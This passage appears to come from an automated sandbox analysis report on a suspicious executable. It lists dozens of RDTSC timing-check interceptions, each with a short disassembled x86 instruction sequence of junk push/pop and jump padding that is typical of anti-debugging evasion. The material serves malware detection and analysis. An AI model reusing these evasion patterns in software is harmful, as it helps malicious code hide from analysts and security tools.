0x0000005a push 00000003h 0x0000005c mov dword ptr [ebp+122D1F9Fh], edx 0x00000062 add edi, 7284C510h 0x00000068 call 00007F43F0D0DC69h 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F43F0D0DC77h 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104F39 second address: 1104F3F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104F3F second address: 1104FA2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F43F0D0DC68h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edi 0x00000012 pop edx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push ebx 0x00000018 jmp 00007F43F0D0DC77h 0x0000001d pop ebx 0x0000001e mov eax, dword ptr [eax] 0x00000020 js 00007F43F0D0DC84h 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a jns 00007F43F0D0DC6Eh 0x00000030 push edi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104FA2 second address: 1104FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 mov esi, dword ptr [ebp+122D38F4h] 0x0000000c lea ebx, dword ptr [ebp+12446D5Bh] 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F43F0D10388h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jnp 00007F43F0D1038Ch 0x00000035 ja 00007F43F0D10386h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105051 second address: 11050A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+122D20C8h], edx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F43F0D0DC68h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1849h], esi 0x0000002f call 00007F43F0D0DC69h 0x00000034 push ecx 0x00000035 jmp 00007F43F0D0DC75h 0x0000003a pop ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d push ecx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11050A8 second address: 11050BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jbe 00007F43F0D10388h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11050BF second address: 11050E7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F43F0D0DC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d ja 00007F43F0D0DC73h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105235 second address: 1105239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111723C second address: 1117245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125F09 second address: 1125F1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F43F0D10386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F43F0D10386h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112603E second address: 1126074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC79h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007F43F0D0DC66h 0x00000016 jmp 00007F43F0D0DC6Bh 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1126074 second address: 112607C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112634E second address: 1126353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11264AE second address: 11264B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11268AC second address: 11268B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F43F0D0DC66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1126A2F second address: 1126A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112741C second address: 1127445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F43F0D0DC6Ch 0x0000000c jmp 00007F43F0D0DC76h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1127B49 second address: 1127B4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FB61 second address: 112FB8A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F43F0D0DC6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F43F0D0DC76h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134762 second address: 1134785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43F0D10396h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134785 second address: 1134789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133D86 second address: 1133DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F43F0D1038Bh 0x0000000c popad 0x0000000d jo 00007F43F0D103ACh 0x00000013 push esi 0x00000014 jmp 00007F43F0D10394h 0x00000019 pop esi 0x0000001a pushad 0x0000001b jc 00007F43F0D10386h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133F45 second address: 1133F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133F49 second address: 1133F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133F4F second address: 1133F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F43F0D0DC6Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113568C second address: 11356A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D10392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135D72 second address: 1135D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136372 second address: 113637C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F43F0D10386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136643 second address: 1136649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136649 second address: 113664D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113664D second address: 1136651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11366BC second address: 11366C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113760F second address: 1137614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137614 second address: 113762C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D1038Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113762C second address: 1137632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137632 second address: 1137636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11376EE second address: 11376F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11376F4 second address: 11376F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1139CD4 second address: 1139CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A826 second address: 113A82A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A560 second address: 113A565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A565 second address: 113A573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A573 second address: 113A579 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A579 second address: 113A57E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140C85 second address: 1140C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140C8A second address: 1140C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141DF3 second address: 1141DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F43F0D0DC66h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141DFE second address: 1141E14 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43F0D10388h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F43F0D10386h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142D3F second address: 1142D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141E14 second address: 1141E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143C15 second address: 1143C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143C19 second address: 1143C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jns 00007F43F0D10386h 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143CF1 second address: 1143CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144DE1 second address: 1144DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144DE7 second address: 1144DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144DF0 second address: 1144E12 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43F0D10386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jnl 00007F43F0D10392h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147AB6 second address: 1147ABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144F1B second address: 1144F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147ABC second address: 1147AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147AC0 second address: 1147AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147AC4 second address: 1147B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push edi 0x0000000c mov bl, E8h 0x0000000e pop edi 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D2841h], eax 0x00000017 push 00000000h 0x00000019 jno 00007F43F0D0DC69h 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 jng 00007F43F0D0DC68h 0x00000027 pushad 0x00000028 popad 0x00000029 jo 00007F43F0D0DC6Ch 0x0000002f jng 00007F43F0D0DC66h 0x00000035 popad 0x00000036 push eax 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148B08 second address: 1148B38 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43F0D1038Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007F43F0D10395h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147D3A second address: 1147D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114ABE9 second address: 114ABF3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43F0D10386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114ABF3 second address: 114AC0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F43F0D0DC6Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AC0B second address: 114AC6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D1038Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F43F0D10388h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, 7450B805h 0x0000002a push 00000000h 0x0000002c or dword ptr [ebp+122D211Eh], edx 0x00000032 push 00000000h 0x00000034 xchg eax, esi 0x00000035 pushad 0x00000036 jmp 00007F43F0D10397h 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148D0C second address: 1148D32 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43F0D0DC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43F0D0DC77h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148D32 second address: 1148D3C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CB79 second address: 114CB7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149E82 second address: 1149E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148D3C second address: 1148D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CB7D second address: 114CBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43F0D10397h 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1910h], esi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F43F0D10388h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D2E6Ch], eax 0x00000035 push 00000000h 0x00000037 or ebx, dword ptr [ebp+122D380Ch] 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CBD6 second address: 114CBE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114ED53 second address: 114ED59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DE8D second address: 114DEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC77h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F43F0D0DC6Ch 0x00000013 jnp 00007F43F0D0DC66h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DEB8 second address: 114DECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43F0D10391h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EE0D second address: 114EE11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EE11 second address: 114EE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EE1B second address: 114EE1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EE1F second address: 114EE4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D1038Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007F43F0D10396h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FEF8 second address: 114FEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FEFD second address: 114FF03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114FF03 second address: 114FF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1150121 second address: 1150127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1150127 second address: 115012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11585E5 second address: 11585EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11585EE second address: 1158604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F43F0D0DC66h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115876A second address: 1158775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F43F0D10386h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1158775 second address: 11587A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43F0D0DC71h 0x00000009 jmp 00007F43F0D0DC78h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11587A2 second address: 11587AC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43F0D10386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11588FF second address: 1158918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F43F0D0DC6Ch 0x0000000b jbe 00007F43F0D0DC66h 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F43F0D0DC66h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11634DC second address: 11634E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
